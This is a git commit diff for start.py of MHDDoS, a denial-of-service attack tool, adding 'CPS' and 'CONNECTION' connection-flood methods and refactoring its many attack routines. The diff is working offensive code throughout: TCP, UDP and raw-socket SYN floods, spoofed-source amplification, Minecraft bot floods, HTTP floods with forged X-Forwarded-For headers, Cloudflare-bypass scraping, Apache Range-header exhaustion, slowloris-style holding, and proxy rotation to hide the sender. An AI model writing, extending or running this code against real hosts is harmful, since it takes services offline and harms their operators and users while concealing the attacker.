add cps method and connection, fixed counter, powerup

This commit is contained in:
MHProDev 2022-03-09 17:30:01 +03:30
parent c6922926e9
commit ba8af28530

620
start.py
View File

@ -44,7 +44,7 @@ ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.3 SNAPSHOT"
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
@ -84,7 +84,7 @@ class Methods:
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT"
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
@ -100,13 +100,10 @@ google_agents = [
class Counter(object):
def __init__(self, value=0):
self._value = RawValue('i', value)
self._lock = Lock()
def __iadd__(self, value):
with self._lock:
self._value.value += value
return self
@ -114,13 +111,12 @@ class Counter(object):
return self._value.value
def set(self, value):
with self._lock:
self._value.value = value
return self
REQUESTS_SENT = Counter()
bytes_sent = Counter()
BYTES_SEND = Counter()
class Tools:
@ -157,6 +153,33 @@ class Tools:
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
@ -213,14 +236,13 @@ class Minecraft:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
@ -248,19 +270,21 @@ class Layer4(Thread):
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
with suppress(Exception):
while self._synevent.is_set():
self.SENT_FLOOD()
def get_effective_socket(self,
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
return randchoice(self._proxies).open_socket(
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
return socket(conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
@ -268,6 +292,8 @@ class Layer4(Thread):
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
@ -300,121 +326,99 @@ class Layer4(Thread):
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
global bytes_sent, REQUESTS_SENT
try:
with self.get_effective_socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
while s.send(randbytes(1024)):
REQUESTS_SENT += 1
bytes_sent += 1024
except Exception:
s.close()
s = None
with suppress(Exception),self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
global bytes_sent, REQUESTS_SENT
payload = Minecraft.handshake(self._target, 74, 1)
try:
with self.get_effective_socket(AF_INET, SOCK_STREAM) as s:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception),self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception),self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception),self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception),socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception),self.open_connection(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
s.send(payload)
bytes_sent += len(payload)
while s.send(b'\x01'):
s.send(b'\x00')
REQUESTS_SENT += 2
bytes_sent += 2
except Exception:
s.close()
def UDP(self) -> None:
global bytes_sent, REQUESTS_SENT
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(randbytes(1024), self._target):
REQUESTS_SENT += 1
bytes_sent += 1024
except Exception:
s.close()
def SYN(self) -> None:
global bytes_sent, REQUESTS_SENT
payload = self._genrate_syn()
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(payload, self._target):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
def AMP(self) -> None:
global bytes_sent, REQUESTS_SENT
payload = next(self._amp_payloads)
try:
with socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(*payload):
REQUESTS_SENT += 1
bytes_sent += len(payload[0])
except Exception:
s.close()
def MCBOT(self) -> None:
global bytes_sent, REQUESTS_SENT
login = Minecraft.login("MHDDoS_" + ProxyTools.Random.rand_str(5))
handshake = Minecraft.handshake_forwarded(self._target,
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4())
try:
with self.get_effective_socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
uuid4()))
Tools.send(s, Minecraft.login("MHDDoS_" + ProxyTools.Random.rand_str(5)))
s.send(handshake)
s.send(login)
bytes_sent += (len(handshake + login))
REQUESTS_SENT += 2
while s.recv(1):
keep = Minecraft.keepalive(randint(1000, 123456))
s.send(keep)
bytes_sent += len(keep)
REQUESTS_SENT += 1
c = 5
while c:
chat = Minecraft.chat(ProxyTools.Random.rand_str(255))
s.send(chat)
REQUESTS_SENT += 1
bytes_sent += len(chat)
sleep(1.2)
c-=1
except Exception:
s.close()
c = 120
while Tools.send(s, Minecraft.keepalive(randint(1000, 10000))):
c -= 1
if c:
continue
c = 100
chat = Minecraft.chat(Tools.randchr(100))
Tools.send(s, chat)
Tools.safe_close(s)
def VSE(self) -> None:
global bytes_sent, REQUESTS_SENT
payload = (
b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(payload, self._target):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
@ -445,7 +449,7 @@ class Layer4(Thread):
return payloads
# noinspection PyBroadException
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
@ -522,35 +526,31 @@ class HttpFlood(Thread):
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
with suppress(Exception):
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
payload: str = ""
payload += "X-Forwarded-Proto: Http\r\n"
payload += f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
payload += f"Via: {spoof}\r\n"
payload += f"Client-IP: {spoof}\r\n"
payload += f'X-Forwarded-For: {spoof}\r\n'
payload += f'Real-IP: {spoof}\r\n'
return payload
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += other if other else ""
return str.encode(f"{payload}\r\n")
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket()
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
@ -565,11 +565,9 @@ class HttpFlood(Thread):
@property
def randHeadercontent(self) -> str:
payload: str = ""
payload += f"User-Agent: {randchoice(self._useragents)}\r\n"
payload += f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n"
payload += self.SpoofIP
return payload
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
@ -581,39 +579,30 @@ class HttpFlood(Thread):
else "REQUESTS"
def POST(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
try:
with self.open_connection() as s:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
@ -621,31 +610,23 @@ class HttpFlood(Thread):
" %s=%s\r\n" %
(randint(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
@ -657,40 +638,28 @@ class HttpFlood(Thread):
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
global bytes_sent, REQUESTS_SENT
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(self._defaultpayload):
REQUESTS_SENT += 1
bytes_sent += len(self._defaultpayload)
except Exception:
s.close()
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
@ -709,94 +678,73 @@ class HttpFlood(Thread):
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
try:
with self.open_connection() as s:
s.send(p1)
s.send(p2)
bytes_sent += len(p1 + p2)
REQUESTS_SENT += 2
s = None
with suppress(Exception),self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
while s.send(payload) and s.recv(1):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
s = None
with suppress(Exception),self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
global bytes_sent, REQUESTS_SENT
if self._proxies:
pro = randchoice(self._proxies)
try:
with create_scraper() as s:
s = None
with suppress(Exception),create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def AVB(self):
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global bytes_sent, REQUESTS_SENT
with create_scraper() as s:
try:
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception),create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
@ -804,84 +752,67 @@ class HttpFlood(Thread):
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
global bytes_sent, REQUESTS_SENT
payload: str | bytes = self._payload
payload += "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6),
self._target.authority)
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
payload: str | bytes = (self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
global bytes_sent, REQUESTS_SENT
payload: str | bytes = self._payload
payload += "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6),
self._target.authority)
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
payload: str | bytes = self.generate_payload()
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
s.send(b'0')
bytes_sent += 1
except Exception:
s.close()
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, bytes_sent
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with Session() as s:
s = None
with suppress(Exception),Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
bytes_sent += Tools.sizeOfRequest(res)
except Exception:
s.close()
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
global bytes_sent, REQUESTS_SENT
payload = "%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6))
payload = (payload + 'Accept-Encoding: gzip, deflate, br\r\n'
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
@ -891,54 +822,54 @@ class HttpFlood(Thread):
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
global bytes_sent, REQUESTS_SENT
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += "User-Agent: null\r\n"
payload += "Referrer: null\r\n"
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
payload: str | bytes = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
if s.send(payload):
REQUESTS_SENT += 1
bytes_sent += len(payload)
except Exception:
s.close()
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=5s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
def SLOW(self):
global bytes_sent, REQUESTS_SENT
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s = None
with suppress(Exception),self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
while s.send(payload) and s.recv(1):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % randint(1, 5000))
if s.send(keep):
Tools.send(s, keep)
sleep(self._rpc / 15)
REQUESTS_SENT += 1
bytes_sent += len(keep)
break
except Exception:
s.close()
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
@ -981,22 +912,6 @@ class HttpFlood(Thread):
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
def BOMB(self):
pro = randchoice(self._proxies)
run([
f'{Path.home() / "go/bin/bombardier"}',
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--no-print',
'--timeout=5s',
f'--requests={self._rpc}',
f'--proxy={pro}',
f'{self._target.human_repr()}',
])
class ProxyManager:
@ -1294,8 +1209,7 @@ class ToolsConsole:
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" %
domain) as s:
with suppress(Exception),get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
@ -1315,7 +1229,7 @@ def handleProxyList(con, proxy_li, proxy_ty, url=None):
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "https://google.com",
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
@ -1467,7 +1381,7 @@ if __name__ == '__main__':
proxy_ty = int(argfive)
proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
proxies = handleProxyList(con, proxy_li, proxy_ty)
if method not in {"MINECRAFT", "MCBOT", "TCP"}:
if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
exit("this method cannot use for layer4 proxy")
else:
@ -1485,10 +1399,10 @@ if __name__ == '__main__':
while time() < ts + timer:
logger.debug('PPS: %s, BPS: %s / %d%%' %
(Tools.humanformat(int(REQUESTS_SENT)),
Tools.humanbytes(int(bytes_sent)),
Tools.humanbytes(int(BYTES_SEND)),
round((time() - ts) / timer * 100, 2)))
REQUESTS_SENT.set(0)
bytes_sent.set(0)
BYTES_SEND.set(0)
sleep(1)
event.clear()